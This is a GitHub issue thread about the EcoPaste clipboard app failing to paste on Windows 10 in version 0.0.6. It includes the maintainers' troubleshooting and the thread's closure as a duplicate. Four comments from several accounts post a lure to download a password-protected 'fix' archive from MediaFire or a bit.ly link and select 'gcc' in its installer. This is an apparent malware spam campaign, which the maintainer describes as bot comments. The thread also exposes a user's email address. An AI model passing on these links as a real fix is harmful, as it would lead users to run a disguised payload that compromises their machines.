### ISSUE TITLE
[bug]  Windows10专业版无法粘贴

### ISSUE THREAD

**Issue by dd-oss** [EcoPasteHub/EcoPaste#464]
### Describe the bug

不论是我自己的windows10还是虚拟机中重新安装的温度测试，最新版0.0.6都无法粘贴。点击后不会粘贴进相关编辑框。 Windows11系统正常。彻底卸载删除后，重新安装0.0.5版才恢复正常使用。请作者修复。

### Expected behavior

在windows10专业版中也能正常粘贴。

### Application and system information

```text
{
  "appName": "EcoPaste",
  "appVersion": "0.0.5",
  "tauriVersion": "1.7.1",
  "platform": "Windows_NT",
  "platformArch": "x86_64",
  "platformVersion": "10.0.19045"
}
```

**Comment by dd-oss** [comment]
补充一点，问题是发生在0.0.6版本上，我复制的信息是0.0.5，是因为我只能用0.0.5板才能够使用。

**Comment by amaoo** [comment]
你试试 卸载 0.0.5 同时删除 配置文件，然后安装 0.0.6。重新设置下粘贴试试

**Comment by dd-oss** [comment]
> 你试试 卸载 0.0.5 同时删除 配置文件，然后安装 0.0.6。重新设置下粘贴试试

试过，还是不行的。虚拟机里面的windows10，如果赋予管理员权限启动，并且把兼容性设置为windows8就可以正常使用，但真实主机不行，依然整体不了。能听见声音，感觉已经复制到剪切板，但粘贴不出来。

**Comment by ayangweb** [comment]
你试试用管理员模式启动 app 行不行，目前测试情况是如果目标 app 是管理员模式启动的，那么 EcoPaste 也需要用管理员模式打开！

**Comment by ayangweb** [comment]
如果以上操作还是不行，麻烦操作步骤录个屏！

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dd-oss** [comment]
这是故障视频，前面的0.0.5版已经全部删除干净，包括配置文件。重新安装的0.0.6版本，并且演示了用管理员权限启动的情况，没任何变化。
https://github.com/user-attachments/assets/23d410d6-4c76-46dc-9c1c-50e78e843ef8

**Comment by ayangweb** [comment]
好的，我们找台 win10 的机器排查下！

**Comment by dd-oss** [comment]
因为0.0.5版本是正常的，建议从0.0.5和0.0.6版本的粘贴机制入手来对比找一下原因，或者把0.0.6版本的粘贴部分还是换回0.0.5的，这样应该就能恢复吧。

**Comment by ayangweb** [comment]
OK，我大概知道问题出现的原因，只是目前没有一台 win10 的机器来排查测试！

**Comment by dd-oss** [comment]
要不你按照你的判断编译一个新版本发我这个邮箱dsq0529@qq.com，我来帮你测试。因为我这个就是故障机器，如果我这个能解决，那就肯定是你判断的问题了。

**Comment by ayangweb** [comment]
加一下[微信群](https://github.com/ayangweb/EcoPaste?tab=readme-ov-file#community)吧！

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ayangweb** [comment]
帖子先锁了，人机评论太多了！

**Comment by ayangweb** [comment]
Duplicate of #816 

目前一切稳定，后续将加入管理员模式启动配置项！
